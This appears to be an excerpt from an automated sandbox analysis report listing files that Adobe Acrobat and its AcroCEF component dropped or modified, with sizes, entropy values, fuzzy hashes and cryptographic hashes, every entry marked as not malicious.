MD5: | DFC9E9B8FBF7CD1AA07519A93D2A15B9 |
SHA1: | BCA906C3E7A153C888ECF27A7886D7426B26FA68 |
SHA-256: | 32F223BFB798C6A93B4695D46F184319EF47142D9D1FA0CD307FBB22B3FECFC2 |
SHA-512: | 8CF65EE5DB259C4D8E224476FA823A69C3B66C86C75B4ECD0449DE287D29A673B197C35E9D7F89CB798F9513A1741CE2C8B5A5209129161CEE5DBC5307E7D157 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.193116266798783 |
Encrypted: | false |
SSDEEP: | 6:iO4THpM+q2P92nKuAl9OmbnIFUtST2F+ZmwsT2FBMVkwO92nKuAl9OmbjLJ:7wJM+v4HAahFUtm9/s4MV5LHAaSJ |
MD5: | 8A97E848160641A1A2F496CADC2E6E06 |
SHA1: | EF645C1320ADA5C9C06464FE920A92837B5C22F6 |
SHA-256: | 5328794194A609FCDFEA9A52DD289CE7095BB1452406610C5644B1E427214D7C |
SHA-512: | 50915D293AE782FFCC297BCF6208F7D4E3E37AB86DF9DF26887781C9D7C1B8B8AAFCB66C7D6C98EAA27BA81353A1D89B9996756B2252E928CD1562492B68245F |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.193116266798783 |
Encrypted: | false |
SSDEEP: | 6:iO4THpM+q2P92nKuAl9OmbnIFUtST2F+ZmwsT2FBMVkwO92nKuAl9OmbjLJ:7wJM+v4HAahFUtm9/s4MV5LHAaSJ |
MD5: | 8A97E848160641A1A2F496CADC2E6E06 |
SHA1: | EF645C1320ADA5C9C06464FE920A92837B5C22F6 |
SHA-256: | 5328794194A609FCDFEA9A52DD289CE7095BB1452406610C5644B1E427214D7C |
SHA-512: | 50915D293AE782FFCC297BCF6208F7D4E3E37AB86DF9DF26887781C9D7C1B8B8AAFCB66C7D6C98EAA27BA81353A1D89B9996756B2252E928CD1562492B68245F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 338 |
Entropy (8bit): | 5.208020870648927 |
Encrypted: | false |
SSDEEP: | 6:iO4Th3+q2P92nKuAl9Ombzo2jMGIFUtSTyFZZZmwsT7VkwO92nKuAl9Ombzo2jM4:7whOv4HAa8uFUtmm/sh5LHAa8RJ |
MD5: | C542AE5FFFA8D69037DBB6857BD9FDA1 |
SHA1: | 6E7C9D230200E466D581293BD7FF2D441F05B01E |
SHA-256: | BA843FFCFD2F6260704E42F67864F8526EEE69C8509CE0BA4DE47B360674E15E |
SHA-512: | 60F7DD28030D18700AD744AC8DE485975829011254855DEB232EFF9B700EBE3234E92BE036A1FA314D46B4A6A5F0314311C6CAD6F5E08400BDCA056AA5CD3E84 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 338 |
Entropy (8bit): | 5.208020870648927 |
Encrypted: | false |
SSDEEP: | 6:iO4Th3+q2P92nKuAl9Ombzo2jMGIFUtSTyFZZZmwsT7VkwO92nKuAl9Ombzo2jM4:7whOv4HAa8uFUtmm/sh5LHAa8RJ |
MD5: | C542AE5FFFA8D69037DBB6857BD9FDA1 |
SHA1: | 6E7C9D230200E466D581293BD7FF2D441F05B01E |
SHA-256: | BA843FFCFD2F6260704E42F67864F8526EEE69C8509CE0BA4DE47B360674E15E |
SHA-512: | 60F7DD28030D18700AD744AC8DE485975829011254855DEB232EFF9B700EBE3234E92BE036A1FA314D46B4A6A5F0314311C6CAD6F5E08400BDCA056AA5CD3E84 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\1208eec8-f3cf-474b-bb78-d0f23e0ab6bb.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 508 |
Entropy (8bit): | 5.053925429139465 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqxSsBdOg2H2Acaq3QYiubxnP7E4T3OF+:Y2sRdsKXdMH2r3QYhbxP7nbI+ |
MD5: | FA23052D7673FC4AB154A531C2CBFA8E |
SHA1: | 17AEE38A37252DBE628615B8E308DD30D0EBB618 |
SHA-256: | 725C1F416153E6AFE7AACAD482AB59808201A3131E67D8B226FA696AB2BA1063 |
SHA-512: | 7F3FA8367D98CFF48CFDB83C583BF40094B9088428988644AEDBCD2E5A3B87CDBBDFBBDB788D5BEADD453D942C3CFB03045702041C04AE232C47803BF0602243 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 508 |
Entropy (8bit): | 5.053925429139465 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqxSsBdOg2H2Acaq3QYiubxnP7E4T3OF+:Y2sRdsKXdMH2r3QYhbxP7nbI+ |
MD5: | FA23052D7673FC4AB154A531C2CBFA8E |
SHA1: | 17AEE38A37252DBE628615B8E308DD30D0EBB618 |
SHA-256: | 725C1F416153E6AFE7AACAD482AB59808201A3131E67D8B226FA696AB2BA1063 |
SHA-512: | 7F3FA8367D98CFF48CFDB83C583BF40094B9088428988644AEDBCD2E5A3B87CDBBDFBBDB788D5BEADD453D942C3CFB03045702041C04AE232C47803BF0602243 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4099 |
Entropy (8bit): | 5.2400570237751625 |
Encrypted: | false |
SSDEEP: | 96:QqBpCqGp3Al+NehBmkID2w6bNMhugoKTNY+No/KTNcygLPGLLUKtxxA8:rBpJGp3AoqBmki25ZEVoKTNY+NoCTNLj |
MD5: | CD28125BE29271580789B7F2320BD9E7 |
SHA1: | 345E7CBC5EE63748F23EBD3C4D4C1055EDDA83C2 |
SHA-256: | D84736C4244260B8094545E1ABE75917D619D4F0609B2283DF8499986F4E9570 |
SHA-512: | C19335DC19B10505CA35945C73B529C8230DE6D5C0F69E37947D980C2D8A82B614F7CE8FDAE77390AE4BEC9EC2130985A892F4289582F69DB716BC74B7409DA6 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 326 |
Entropy (8bit): | 5.20080038083157 |
Encrypted: | false |
SSDEEP: | 6:iO4TMGt+q2P92nKuAl9OmbzNMxIFUtSTWZZmwsTWNVkwO92nKuAl9OmbzNMFLJ:7wxov4HAa8jFUtmy/s+5LHAa84J |
MD5: | 7AADE647AD22E0D7328C468BA1DD97BD |
SHA1: | 5832E0CCF68C86A003E99CEDE39D8E1445AC653E |
SHA-256: | 661833489FA41559A7502286A92EA046588170594AE59BBAEA85E862074CDF3F |
SHA-512: | 17DB40D0706D7646F946461ED1F4069F7C14EA50C1E74E4220D725B16400362B3CB6720BB2A11A22B4492125C5A9DC7B9D15CA527A87F029887E63BB74EBEACB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 326 |
Entropy (8bit): | 5.20080038083157 |
Encrypted: | false |
SSDEEP: | 6:iO4TMGt+q2P92nKuAl9OmbzNMxIFUtSTWZZmwsTWNVkwO92nKuAl9OmbzNMFLJ:7wxov4HAa8jFUtmy/s+5LHAa84J |
MD5: | 7AADE647AD22E0D7328C468BA1DD97BD |
SHA1: | 5832E0CCF68C86A003E99CEDE39D8E1445AC653E |
SHA-256: | 661833489FA41559A7502286A92EA046588170594AE59BBAEA85E862074CDF3F |
SHA-512: | 17DB40D0706D7646F946461ED1F4069F7C14EA50C1E74E4220D725B16400362B3CB6720BB2A11A22B4492125C5A9DC7B9D15CA527A87F029887E63BB74EBEACB |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 57344 |
Entropy (8bit): | 3.2932777284602173 |
Encrypted: | false |
SSDEEP: | 192:PedRBPVui5V4R4dcQ5V4R4RtYWtEV2UUTTchqGp8F/7/z+FP:PeBci5H5FY+EUUUTTcHqFzqFP |
MD5: | 4750501A9395ACFC2ACC6188DD52E299 |
SHA1: | 8B8B50E61DA63EDFA51B685EA721E3B9FD32A357 |
SHA-256: | DC079B330524B6531273D5D92BEDE66FA1765A93C77B89D0CAEA5814DBF09351 |
SHA-512: | 434428E32EC0B0726E17D54D0104421C87DEB7993E29055AF360E9132AEB2E04014CA6B8457C9C34F657BAF825E6AF4A2B76C16D28DFA9B0F4ABDE10C91B82DB |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.2081503410315833 |
Encrypted: | false |
SSDEEP: | 24:7+tx6zwKIqLKzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9Mzb:7MxCIqOmFTIF3XmHjBoGGR+jMz+Lhmn |
MD5: | 636DCE6D8B597E71B8D6B6FB385AC39E |
SHA1: | 765B1AA4CC30A2E9596EEB83BDC6D74BA237A2E2 |
SHA-256: | E1228A7635B8870B7895D50F5711A8060120AE506F968764103FA0840516DB39 |
SHA-512: | 975204FC75C2359909F365DBC0D2BA0D301ADE17D93291E3B06D9A1047CA76CB0388FE9CF89CA7AE7CD69C5347A7587ADE7F3BCD53274E3C08DD6AAD507875CF |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 71954 |
Entropy (8bit): | 7.996617769952133 |
Encrypted: | true |
SSDEEP: | 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ |
MD5: | 49AEBF8CBD62D92AC215B2923FB1B9F5 |
SHA1: | 1723BE06719828DDA65AD804298D0431F6AFF976 |
SHA-256: | B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F |
SHA-512: | BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7256515731729736 |
Encrypted: | false |
SSDEEP: | 3:kkFklcjBDstfllXlE/HT8k+lz1NNX8RolJuRdxLlGB9lQRYwpDdt:kKFjBDseT8/7NMa8RdWBwRd |
MD5: | 1120C9F3CF7FEB9F23F61117491400ED |
SHA1: | 491A29C7A3F06B566CD2DD9FFF76083F3A60E05E |
SHA-256: | 3B09870F6816E2D5FAE94D38EE38400FCEBEFCE2CAB79F8ECB6D02D597D2BA02 |
SHA-512: | 1D9CF51CBEBCA1374E721851408F48DA71B45F9DA39346F91AF1E506626864220D71793B3807A0E4048542628F9BF1EBB86D68DA1FE00A31C0BB2412F46FF454 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 328 |
Entropy (8bit): | 3.133081597444441 |
Encrypted: | false |
SSDEEP: | 6:kKotL9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:AtiDnLNkPlE99SNxAhUe/3 |
MD5: | A9E5081A93D6A96DD259A5E7F5900E32 |
SHA1: | 5790E57F811DD63AF82481DED6E344FD2E8671D7 |
SHA-256: | 7C3F4DCAF82C670DE5292467EBF0F47AD80140BF35CBDCB2A8C74036B2AD0A85 |
SHA-512: | 0761DAE37CF8C586E1F07EA924F81A2C49819091ABAB82FED9E9EA0A9B0D375E732599018A7464958CFB6F2F194FA5521B251BCACCC9D9E2F4227BE7199CEF41 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.353866392446037 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXPTbiSS1bQAUXb+FIbRI6XVW7+0YzUoAvJM3g98kUwPeUkwRe9:YvXKX7biSDXSYpW7aGMbLUkee9 |
MD5: | CB03F9F68EBB5C3C53F3CC80600EA688 |
SHA1: | 7196259F5E5E122D030429E0E44F0494F6B7AD5A |
SHA-256: | DA7C80F741F8618A4460EDB61566EB54D749F974FB84F144DF6F16F4075185BB |
SHA-512: | 8D88D975F2EDAB06693348B511E98895EE0F36F31581F59A5DCBED099DCE0E5470DA7ABABE622A29F818C3A17C91E8EB8E23D2DD8348F7133C42063138C24111 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.2932829239287305 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXPTbiSS1bQAUXb+FIbRI6XVW7+0YzUoAvJfBoTfXpnrPeUkwRe9:YvXKX7biSDXSYpW7aGWTfXcUkee9 |
MD5: | 14246CB6B7950436C8A8C90E47676F10 |
SHA1: | C20E3504B6D8BFF10349B39093250F6513D26910 |
SHA-256: | 85FC6C1ADEBD168CC9D109203C0FC0F45DF3873FA696BFA77AA6CB9836B4B334 |
SHA-512: | 9D3BD2D4887C93D363527D5F82618DD86ED07D160AC267A6C6B21D7E2CB57F39519FB6C1C4DD225421C1EA119BB59578E5DF7CDB0251A07343D3E2E8A3B009E5 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.2707551731323585 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXPTbiSS1bQAUXb+FIbRI6XVW7+0YzUoAvJfBD2G6UpnrPeUkwRe9:YvXKX7biSDXSYpW7aGR22cUkee9 |
MD5: | 80E67950BD94C3EF961E33E5FA9FE73F |
SHA1: | 6F736AAC9EC324968E147846A18816C614032D67 |
SHA-256: | 2C7C04C2D53C9424F6CB229F8D36684EC0810CCC2BEF1BA2780E9A5A11E7C682 |
SHA-512: | B87C4CCD9BB0F94E4D816D1D6E5898B5A5BAB5C5AAE0404985CF619B2B31D53A3F892B103B4D712646213A84519930B23E9C89FED4F52B9756F69123C9C3A867 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.332426042244845 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXPTbiSS1bQAUXb+FIbRI6XVW7+0YzUoAvJfPmwrPeUkwRe9:YvXKX7biSDXSYpW7aGH56Ukee9 |
MD5: | ABD0497BB10D9A6ED5F75A9F79A039BD |
SHA1: | 81A6A16E2A2BFF10270A2AD5CEC345E30F970A4A |
SHA-256: | 511864329168D41E564150B1E3F8973A80617618AEBDA0CCE60C889C6D7E0C7F |
SHA-512: | 58532AF475A7825AE4001AA1AC4A1CD9E63B205E240D5FF016984B56BAA8DCDB5F6E3E984EEB211AFB1A08D15E91209B1BA7A81F609A6469FC40672F2CAA6F20 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.691711737472827 |
Encrypted: | false |
SSDEEP: | 24:Yv6X7eSDX3i3pLgE9cQx8LennAvzBvkn0RCmK8czOCCSK4:Yvmef3hgy6SAFv5Ah8cv/5 |
MD5: | 3B4785E21FAE0D5B9B4A7081BE0F3633 |
SHA1: | 05FE4EEC1B8115613330D4E6C077CCBC9743B4F5 |
SHA-256: | 2BA1E0393C19FD0582BFFFA1A47F89600346BE1324201FC6A1C2D79312FBE532 |
SHA-512: | 62CCC2E0D5ED4917C65341FABBE15DB90627214F1EC489D6678989E7E483913B4A61DF753F108015294576DE2968909F2899AC9496D234F25BBA5DD39DB5B185 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.2802831395783905 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXPTbiSS1bQAUXb+FIbRI6XVW7+0YzUoAvJf8dPeUkwRe9:YvXKX7biSDXSYpW7aGU8Ukee9 |
MD5: | 09905B80FF6D8D4E908E2FEE4A8AE734 |
SHA1: | EE83151942E7A7BD0446BEF4A6DF58B1D9460711 |
SHA-256: | D5284A47D4845DA610A7CA7CA366B057062F6D52154493E8DA7C3A21E5D326CF |
SHA-512: | 2D5D93DCDC01D7386E41879AE44A2740C1A6F187E9DA2F4752C0DB5766C16994E72DD5E5755C2EDFEB53711D673E8A85494B68E3EA8E878E10E1C232C3AC0F9B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.2814409114940215 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXPTbiSS1bQAUXb+FIbRI6XVW7+0YzUoAvJfQ1rPeUkwRe9:YvXKX7biSDXSYpW7aGY16Ukee9 |
MD5: | A4D16B1C5EF48D6EE2AF2FB4040F64CC |
SHA1: | 01CB662ADE33BECD624D94EAA122CA3E4D2E1A9E |
SHA-256: | E06BBE3D005085687ACA56D4A8A781DA74DBAF41C6B1B9C47B911DDECAD6F6C0 |
SHA-512: | D88BBC2D88670EB2E9672169A33E2D46F009DB92AAA9D25A7C11D6D7CDB6F2A2E8A8895DADE54BA309892696EE8E3922A8838015A8D5BEDDAAEE9BE465EBC67C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.303937643413659 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXPTbiSS1bQAUXb+FIbRI6XVW7+0YzUoAvJfFldPeUkwRe9:YvXKX7biSDXSYpW7aGz8Ukee9 |
MD5: | 22D3DF7E82A7E36FE92DCE38E7D41632 |
SHA1: | 134E432B2DAC6F9E29D1F9F8D0F50EB8E7785C2F |
SHA-256: | 6380C228B171D728B52BEB9D3B1478C5442FD209FD95B927D493273D3F2E60B2 |
SHA-512: | 70FFBE96E33CE01EC263D117AA94EE321DA14708D6698A506E5A328BE23F7C6C147A8C2EBCCC19CC70B15926A2C1D13D04A03F7D79A3E21FDCBE5F4659854F7F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.309279497637637 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXPTbiSS1bQAUXb+FIbRI6XVW7+0YzUoAvJfzdPeUkwRe9:YvXKX7biSDXSYpW7aGb8Ukee9 |
MD5: | 01B15A7B9190F89AFCF4C4121930F92D |
SHA1: | 29DD8D023F661BB76C99C97D026E290CEF149B3D |
SHA-256: | 56F20DFA2F38E285A0ACD43A33CC51EC3E5D0EACBA344A66F4FFC720A98FBC60 |
SHA-512: | 82DB42A99130755CCB8CDDE0E150ADE25C3A3D84117DDAA0E81A41945A63B503F2F5E07C7D9B390A85B2AE8A3DB0F59ABC35E397FDACBAC737E851AC089E0638 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.289420063376252 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXPTbiSS1bQAUXb+FIbRI6XVW7+0YzUoAvJfYdPeUkwRe9:YvXKX7biSDXSYpW7aGg8Ukee9 |
MD5: | 501230193B26F6407276AD975E7DD005 |
SHA1: | 9CC9E00626EA9C021BD1C45EEEAB7D010EB766B3 |
SHA-256: | 9116F2B49EAE2B30155DC05DD07E57BAEC331744A9E96163436F7A5E5E94A7A2 |
SHA-512: | 8ECE51147A4CC6DBE575DECCDCA8F65E77863DDBA670AD225EA93D3C1D45D8E6BEEC59D08F8CA491E1254CB5F00AC9C87E8D63B83FC8719526E52A51B6D03FE2 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.275284169709272 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXPTbiSS1bQAUXb+FIbRI6XVW7+0YzUoAvJf+dPeUkwRe9:YvXKX7biSDXSYpW7aG28Ukee9 |
MD5: | 56461D47FEB8C239C969E72584073CFA |
SHA1: | C6AB9E118DF8EB7D12B5F5FA65443D3C7AF7A474 |
SHA-256: | D43D8DC8E71FC0BD1E0604978741E674396FB7A3262A27AF51E18B89ED93B978 |
SHA-512: | A63A7F2C946AFF5A79A2776C5129A44A423DF1F64BCA41A7CF2D211BC7421B4A9CDB31EE78EA57D4CDD7D61F6429DC3EF31D3B8745CA44EC617607405ABE9FAB |
